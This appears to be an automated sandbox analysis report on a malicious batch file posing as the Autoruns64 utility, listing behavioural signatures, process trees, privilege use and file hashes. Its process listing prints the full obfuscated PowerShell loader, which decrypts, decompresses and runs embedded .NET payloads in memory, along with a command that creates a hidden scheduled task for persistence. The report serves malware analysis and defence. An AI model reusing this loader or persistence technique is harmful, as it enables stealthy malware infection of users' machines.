Analysis
-
max time kernel
43s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13/10/2024, 12:17
Static task
static1
Behavioral task
behavioral1
Sample
Autoruns64.bat
Resource
win10v2004-20241007-en
General
-
Target
Autoruns64.bat
-
Size
2.8MB
-
MD5
584382c704d89b38304612ee425a852f
-
SHA1
9d842c7c34bb0c6a00eea6f68ac278bb1ace926c
-
SHA256
a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae
-
SHA512
8055b34e651be041fb68f28e1731e6e09d1d400de7fd0b1eac40d2d9061057405170dfd1fbed0b4e968dd79bd185e9a41120c058880f614239792c9558bfe85c
-
SSDEEP
49152:0GKnII7kx63o02hXAQlJUdJwjnJnjyEUr:0F
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3708 powershell.exe 4476 powershell.exe 3788 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3788 powershell.exe 3788 powershell.exe 3708 powershell.exe 3708 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3492 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeIncreaseQuotaPrivilege 3708 powershell.exe Token: SeSecurityPrivilege 3708 powershell.exe Token: SeTakeOwnershipPrivilege 3708 powershell.exe Token: SeLoadDriverPrivilege 3708 powershell.exe Token: SeSystemProfilePrivilege 3708 powershell.exe Token: SeSystemtimePrivilege 3708 powershell.exe Token: SeProfSingleProcessPrivilege 3708 powershell.exe Token: SeIncBasePriorityPrivilege 3708 powershell.exe Token: SeCreatePagefilePrivilege 3708 powershell.exe Token: SeBackupPrivilege 3708 powershell.exe Token: SeRestorePrivilege 3708 powershell.exe Token: SeShutdownPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeSystemEnvironmentPrivilege 3708 powershell.exe Token: SeRemoteShutdownPrivilege 3708 powershell.exe Token: SeUndockPrivilege 3708 powershell.exe Token: SeManageVolumePrivilege 3708 powershell.exe Token: 33 3708 powershell.exe Token: 34 3708 powershell.exe Token: 35 3708 powershell.exe Token: 36 3708 powershell.exe Token: SeIncreaseQuotaPrivilege 3708 powershell.exe Token: SeSecurityPrivilege 3708 powershell.exe Token: SeTakeOwnershipPrivilege 3708 powershell.exe Token: SeLoadDriverPrivilege 3708 powershell.exe Token: SeSystemProfilePrivilege 3708 powershell.exe Token: SeSystemtimePrivilege 3708 powershell.exe Token: SeProfSingleProcessPrivilege 3708 powershell.exe Token: SeIncBasePriorityPrivilege 3708 powershell.exe Token: SeCreatePagefilePrivilege 3708 powershell.exe Token: SeBackupPrivilege 3708 powershell.exe Token: SeRestorePrivilege 3708 powershell.exe Token: SeShutdownPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeSystemEnvironmentPrivilege 3708 powershell.exe Token: SeRemoteShutdownPrivilege 3708 powershell.exe Token: SeUndockPrivilege 3708 powershell.exe Token: SeManageVolumePrivilege 3708 powershell.exe Token: 33 3708 powershell.exe Token: 34 3708 powershell.exe Token: 35 3708 powershell.exe Token: 36 3708 powershell.exe Token: SeIncreaseQuotaPrivilege 3708 powershell.exe Token: SeSecurityPrivilege 3708 powershell.exe Token: SeTakeOwnershipPrivilege 3708 powershell.exe Token: SeLoadDriverPrivilege 3708 powershell.exe Token: SeSystemProfilePrivilege 3708 powershell.exe Token: SeSystemtimePrivilege 3708 powershell.exe Token: SeProfSingleProcessPrivilege 3708 powershell.exe Token: SeIncBasePriorityPrivilege 3708 powershell.exe Token: SeCreatePagefilePrivilege 3708 powershell.exe Token: SeBackupPrivilege 3708 powershell.exe Token: SeRestorePrivilege 3708 powershell.exe Token: SeShutdownPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeSystemEnvironmentPrivilege 3708 powershell.exe Token: SeRemoteShutdownPrivilege 3708 powershell.exe Token: SeUndockPrivilege 3708 powershell.exe Token: SeManageVolumePrivilege 3708 powershell.exe Token: 33 3708 powershell.exe Token: 34 3708 powershell.exe Token: 35 3708 powershell.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
pid Process 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 3492 Explorer.EXE 3492 Explorer.EXE 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 3492 Explorer.EXE 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe 2576 taskmgr.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 3824 wrote to memory of 4344 3824 cmd.exe 87 PID 3824 wrote to memory of 4344 3824 cmd.exe 87 PID 3824 wrote to memory of 3788 3824 cmd.exe 88 PID 3824 wrote to memory of 3788 3824 cmd.exe 88 PID 3788 wrote to memory of 3708 3788 powershell.exe 90 PID 3788 wrote to memory of 3708 3788 powershell.exe 90 PID 3788 wrote to memory of 1472 3788 powershell.exe 93 PID 3788 wrote to memory of 1472 3788 powershell.exe 93 PID 1472 wrote to memory of 1416 1472 WScript.exe 94 PID 1472 wrote to memory of 1416 1472 WScript.exe 94 PID 1416 wrote to memory of 2600 1416 cmd.exe 96 PID 1416 wrote to memory of 2600 1416 cmd.exe 96 PID 1416 wrote to memory of 4476 1416 cmd.exe 97 PID 1416 wrote to memory of 4476 1416 cmd.exe 97 PID 4476 wrote to memory of 3492 4476 powershell.exe 56 PID 4476 wrote to memory of 1180 4476 powershell.exe 20 PID 4476 wrote to memory of 1372 4476 powershell.exe 23 PID 4476 wrote to memory of 976 4476 powershell.exe 12 PID 4476 wrote to memory of 1960 4476 powershell.exe 35 PID 4476 wrote to memory of 1756 4476 powershell.exe 30 PID 4476 wrote to memory of 3128 4476 powershell.exe 54 PID 4476 wrote to memory of 1548 4476 powershell.exe 27 PID 4476 wrote to memory of 1152 4476 powershell.exe 19 PID 4476 wrote to memory of 2328 4476 powershell.exe 66 PID 4476 wrote to memory of 3768 4476 powershell.exe 70 PID 4476 wrote to memory of 1920 4476 powershell.exe 34 PID 4476 wrote to memory of 1720 4476 powershell.exe 29 PID 4476 wrote to memory of 2704 4476 powershell.exe 46 PID 4476 wrote to memory of 1520 4476 powershell.exe 26 PID 4476 wrote to memory of 1912 4476 powershell.exe 33 PID 4476 wrote to memory of 2340 4476 powershell.exe 41 PID 4476 wrote to memory of 528 4476 powershell.exe 14 PID 4476 wrote to memory of 920 4476 powershell.exe 11 PID 4476 wrote to memory of 1312 4476 powershell.exe 22 PID 4476 wrote to memory of 2680 4476 powershell.exe 45 PID 4476 wrote to memory of 916 4476 powershell.exe 15 PID 4476 wrote to memory of 2488 4476 powershell.exe 44 PID 4476 wrote to memory of 2876 4476 powershell.exe 51 PID 4476 wrote to memory of 1500 4476 powershell.exe 25 PID 4476 wrote to memory of 3664 4476 powershell.exe 57 PID 4476 wrote to memory of 2480 4476 powershell.exe 43 PID 4476 wrote to memory of 1100 4476 powershell.exe 17 PID 4476 wrote to memory of 812 4476 powershell.exe 10 PID 4476 wrote to memory of 1092 4476 powershell.exe 16 PID 4476 wrote to memory of 1288 4476 powershell.exe 21 PID 4476 wrote to memory of 1668 4476 powershell.exe 28 PID 4476 wrote to memory of 1108 4476 powershell.exe 18 PID 4476 wrote to memory of 2064 4476 powershell.exe 38 PID 4476 wrote to memory of 4616 4476 powershell.exe 65 PID 4476 wrote to memory of 4992 4476 powershell.exe 72 PID 4476 wrote to memory of 4004 4476 powershell.exe 68 PID 4476 wrote to memory of 3412 4476 powershell.exe 55 PID 4476 wrote to memory of 2820 4476 powershell.exe 50 PID 4476 wrote to memory of 1824 4476 powershell.exe 32 PID 4476 wrote to memory of 2792 4476 powershell.exe 49 PID 4476 wrote to memory of 2192 4476 powershell.exe 40 PID 4476 wrote to memory of 1992 4476 powershell.exe 36 PID 4476 wrote to memory of 1400 4476 powershell.exe 74 PID 4476 wrote to memory of 2112 4476 powershell.exe 39 PID 4476 wrote to memory of 1780 4476 powershell.exe 31 PID 4476 wrote to memory of 1384 4476 powershell.exe 24 PID 3492 wrote to memory of 2576 3492 Explorer.EXE 101 PID 3492 wrote to memory of 2576 3492 Explorer.EXE 101
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3412
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Local\Temp\Autoruns64.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_802_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2ZEQG0G+BjYSP/d9Z3fmCz2qBG/BXDTNnZDQOO/rA/k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KVEkCIBzeHYcZKu9+A9NfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gaabE=New-Object System.IO.MemoryStream(,$param_var); $JINMt=New-Object System.IO.MemoryStream; $pBZVp=New-Object System.IO.Compression.GZipStream($gaabE, [IO.Compression.CompressionMode]::Decompress); $pBZVp.CopyTo($JINMt); $pBZVp.Dispose(); $gaabE.Dispose(); $JINMt.Dispose(); $JINMt.ToArray();}function execute_function($param_var,$param2_var){ $gnVIQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MHenX=$gnVIQ.EntryPoint; $MHenX.Invoke($null, $param2_var);}$wIXko = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_802.bat';$host.UI.RawUI.WindowTitle = $wIXko;$LSkmM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wIXko).Split([Environment]::NewLine);foreach ($kcaTq in $LSkmM) { if ($kcaTq.StartsWith('KmkUptOWyBfWLjCsREUP')) { $sErRx=$kcaTq.Substring(20); break; }}$payloads_var=[string[]]$sErRx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4476
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2576
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:3768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1400
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.8MB
MD5584382c704d89b38304612ee425a852f
SHA19d842c7c34bb0c6a00eea6f68ac278bb1ace926c
SHA256a01df00146e7c4c1d921a912c1791a32531093f570575005c0d2088c4e00afae
SHA5128055b34e651be041fb68f28e1731e6e09d1d400de7fd0b1eac40d2d9061057405170dfd1fbed0b4e968dd79bd185e9a41120c058880f614239792c9558bfe85c
-
Filesize
124B
MD5ccccab98e6940c5498c7a0498b0418f1
SHA15425777291b559d4de8b06d30f98dd52bbdfcbd8
SHA256e02bbf5a19f9cf26b9a2125e4c91b317ed07c10dea5bb96169c6f6c63e3af65c
SHA5120f9cc8210a3900cb2121edbb6f2bc778f168317e73762b0a856edc405723850ad8a929f3a757d917299f05fdb35056be6ce981df54607fccf01febdb81279b1a